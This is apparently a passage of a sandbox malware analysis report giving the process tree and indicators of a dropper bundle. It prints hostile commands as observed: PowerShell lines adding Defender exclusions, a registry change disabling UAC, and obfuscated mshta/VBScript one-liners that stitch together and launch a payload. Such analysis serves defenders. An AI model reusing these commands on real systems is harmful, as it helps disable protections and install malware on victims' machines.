cmd.exe PID 2368 wrote to memory of 408 2368 setup_install.exe cmd.exe PID 3880 wrote to memory of 1640 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 1640 3880 cmd.exe powershell.exe PID 3880 wrote to memory of 1640 3880 cmd.exe powershell.exe PID 2368 wrote to memory of 940 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 940 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 940 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1064 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1064 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1064 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 2180 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 2180 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 2180 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1656 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1656 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1656 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3460 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3460 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3460 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1344 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1344 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1344 2368 setup_install.exe cmd.exe PID 1064 wrote to memory of 1444 1064 cmd.exe Mon204014f13870f5e.exe PID 1064 wrote to memory of 1444 1064 cmd.exe Mon204014f13870f5e.exe PID 1064 wrote to memory of 1444 1064 cmd.exe Mon204014f13870f5e.exe PID 2368 wrote to memory of 1148 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1148 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1148 2368 setup_install.exe cmd.exe PID 516 wrote to memory of 3936 516 cmd.exe Mon20762bc3f6.exe PID 516 wrote to memory of 3936 516 cmd.exe Mon20762bc3f6.exe PID 516 wrote to memory of 3936 516 cmd.exe Mon20762bc3f6.exe PID 2368 wrote to memory of 1736 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1736 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 1736 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3732 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3732 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3732 2368 setup_install.exe cmd.exe PID 940 wrote to memory of 1992 940 cmd.exe Mon20927aab1e5.exe PID 940 wrote to memory of 1992 940 cmd.exe Mon20927aab1e5.exe PID 940 wrote to memory of 1992 940 cmd.exe Mon20927aab1e5.exe PID 408 wrote to memory of 2008 408 cmd.exe Mon206b909958ed4.exe PID 408 wrote to memory of 2008 408 cmd.exe Mon206b909958ed4.exe PID 408 wrote to memory of 2008 408 cmd.exe Mon206b909958ed4.exe PID 1656 wrote to memory of 2944 1656 cmd.exe Mon206d48916f93c5.exe PID 1656 wrote to memory of 2944 1656 cmd.exe Mon206d48916f93c5.exe PID 3460 wrote to memory of 2696 3460 cmd.exe Mon209c830507d573.exe PID 3460 wrote to memory of 2696 3460 cmd.exe Mon209c830507d573.exe PID 3460 wrote to memory of 2696 3460 cmd.exe Mon209c830507d573.exe PID 1148 wrote to memory of 2708 1148 cmd.exe Mon20d3b8b752.exe PID 1148 wrote to memory of 2708 1148 cmd.exe Mon20d3b8b752.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
O9lXeYrvcZsFeuQn9WTBaPjh.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" O9lXeYrvcZsFeuQn9WTBaPjh.exe -
outlook_office_path 1 IoCs
Processes:
9AfPHFKCRrsSNYDoKcFofsbB.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe -
outlook_win_path 1 IoCs
Processes:
9AfPHFKCRrsSNYDoKcFofsbB.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 9AfPHFKCRrsSNYDoKcFofsbB.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1084
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1320
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1420
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3916 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4384
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2716
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2584
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2564
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2396
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1920
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1204
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1032 -
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:6380
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:11060
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:11140
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:13408
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:13612
-
C:\Users\Admin\AppData\Roaming\jhbafrfC:\Users\Admin\AppData\Roaming\jhbafrf2⤵
- Suspicious use of SetThreadContext
PID:13632 -
C:\Users\Admin\AppData\Roaming\jhbafrfC:\Users\Admin\AppData\Roaming\jhbafrf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:14836 -
C:\Users\Admin\AppData\Roaming\wcbafrfC:\Users\Admin\AppData\Roaming\wcbafrf2⤵PID:14924
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:14292
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:14340
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:8268
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:8196
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:7328
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:13128
-
C:\Users\Admin\AppData\Roaming\jhbafrfC:\Users\Admin\AppData\Roaming\jhbafrf2⤵
- Suspicious use of SetThreadContext
PID:9196 -
C:\Users\Admin\AppData\Roaming\jhbafrfC:\Users\Admin\AppData\Roaming\jhbafrf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:14172 -
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:9024
-
C:\Users\Admin\AppData\Roaming\wcbafrfC:\Users\Admin\AppData\Roaming\wcbafrf2⤵PID:4632
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:15268
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:7204
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:14392
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:6300
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:7120
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:9880
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:8920
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:8812
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:8952
-
C:\Users\Admin\AppData\Roaming\jhbafrfC:\Users\Admin\AppData\Roaming\jhbafrf2⤵
- Suspicious use of SetThreadContext
PID:9680 -
C:\Users\Admin\AppData\Roaming\jhbafrfC:\Users\Admin\AppData\Roaming\jhbafrf3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:10396 -
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:8220
-
C:\Users\Admin\AppData\Roaming\wcbafrfC:\Users\Admin\AppData\Roaming\wcbafrf2⤵PID:8224
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AqDFSDlmWiui\AqDFSDlmWiui.dll",AqDFSDlmWiui2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:10320 -
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe2⤵PID:10256
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
PID:3936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
PID:2844 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon203f01ac7e6.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:2144
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon203f01ac7e6.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon203f01ac7e6.exe") do taskkill /F -Im "%~NxU"7⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
PID:1536 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:3556
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:4380
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:4192
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:2724
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:4992
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:5312
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:7024
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:4528
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:6988
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
- Loads dropped DLL
PID:896 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
PID:2788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon206d48916f93c5.exeMon206d48916f93c5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2944 -
C:\Users\Admin\AppData\Roaming\3877687.scr"C:\Users\Admin\AppData\Roaming\3877687.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052 -
C:\Users\Admin\AppData\Roaming\2961645.scr"C:\Users\Admin\AppData\Roaming\2961645.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3332 -
C:\Users\Admin\AppData\Roaming\1261015.scr"C:\Users\Admin\AppData\Roaming\1261015.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4124 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:5060 -
C:\Users\Admin\AppData\Roaming\5221391.scr"C:\Users\Admin\AppData\Roaming\5221391.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4236 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon20927aab1e5.exe6⤵
- Executes dropped EXE
PID:1560 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon209c830507d573.exeMon209c830507d573.exe5⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon209c830507d573.exe6⤵
- Executes dropped EXE
PID:3240 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
PID:2008 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 6606⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 6846⤵
- Program crash
PID:4360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 7166⤵
- Program crash
PID:5636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 8726⤵
- Program crash
PID:5148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 8286⤵
- Program crash
PID:6308 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 10966⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3444 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
PID:1300 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵PID:3732
-
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
PID:2676 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵PID:1736
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1148
-
C:\Users\Admin\AppData\Local\Temp\7zSC165DCE5\Mon20d3b8b752.exeMon20d3b8b752.exe1⤵
- Executes dropped EXE
PID:2708 -
C:\Users\Admin\Pictures\Adobe Films\G_WJY6Q9SNjyFQKaCdNSQGlu.exe"C:\Users\Admin\Pictures\Adobe Films\G_WJY6Q9SNjyFQKaCdNSQGlu.exe"2⤵
- Executes dropped EXE
PID:4636 -
C:\Users\Admin\Pictures\Adobe Films\3EtYdlz4BS4Q34tWZ34_sC7C.exe"C:\Users\Admin\Pictures\Adobe Films\3EtYdlz4BS4Q34tWZ34_sC7C.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4744 -
C:\Users\Admin\Pictures\Adobe Films\dkKnHOaMC3V7HQOhUbZyzTBO.exe"C:\Users\Admin\Pictures\Adobe Films\dkKnHOaMC3V7HQOhUbZyzTBO.exe"2⤵
- Executes dropped EXE
PID:4748 -
C:\Users\Admin\Pictures\Adobe Films\llCjLXY4R9fHB5q2TyjOChUC.exe"C:\Users\Admin\Pictures\Adobe Films\llCjLXY4R9fHB5q2TyjOChUC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2524 -
C:\Users\Admin\Pictures\Adobe Films\a5ccnK2kBlCtiR75sQxNe_I1.exe"C:\Users\Admin\Pictures\Adobe Films\a5ccnK2kBlCtiR75sQxNe_I1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3816 -
C:\Users\Admin\Pictures\Adobe Films\Pp65i0I9Y1K24s5W4LIQd_5I.exe"C:\Users\Admin\Pictures\Adobe Films\Pp65i0I9Y1K24s5W4LIQd_5I.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2788 -
C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe"C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System policy modification
PID:4232 -
C:\Users\Admin\AppData\Local\Temp\71b55cea-6e6c-4306-8a64-e1e6fff5f4af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\71b55cea-6e6c-4306-8a64-e1e6fff5f4af\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\71b55cea-6e6c-4306-8a64-e1e6fff5f4af\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:6648
-
C:\Users\Admin\AppData\Local\Temp\71b55cea-6e6c-4306-8a64-e1e6fff5f4af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\71b55cea-6e6c-4306-8a64-e1e6fff5f4af\AdvancedRun.exe" /SpecialRun 4101d8 66484⤵PID:5232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe" -Force3⤵PID:7056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe" -Force3⤵PID:7004
-
C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe"C:\Users\Admin\Pictures\Adobe Films\O9lXeYrvcZsFeuQn9WTBaPjh.exe"3⤵PID:4172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 21443⤵
- Program crash
PID:7076 -
C:\Users\Admin\Pictures\Adobe Films\YQuyJEBXZ9noq8wFtxIcifjm.exe"C:\Users\Admin\Pictures\Adobe Films\YQuyJEBXZ9noq8wFtxIcifjm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5084 -
C:\Users\Admin\Pictures\Adobe Films\YQuyJEBXZ9noq8wFtxIcifjm.exe"C:\Users\Admin\Pictures\Adobe Films\YQuyJEBXZ9noq8wFtxIcifjm.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5264 -
C:\Users\Admin\Pictures\Adobe Films\FYRPwfX4q40GQUqlzMJ7uuIN.exe"C:\Users\Admin\Pictures\Adobe Films\FYRPwfX4q40GQUqlzMJ7uuIN.exe"2⤵
- Executes dropped EXE
PID:940 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 6603⤵
- Program crash
PID:5780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 6763⤵
- Program crash
PID:6164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 6323⤵
- Program crash
PID:6612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 6803⤵
- Program crash
PID:6896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 11603⤵
- Program crash
PID:7412 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 12043⤵
- Program crash
PID:7616 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 12403⤵
- Program crash
PID:7824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 12723⤵
- Program crash
PID:8068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 11123⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7936 -
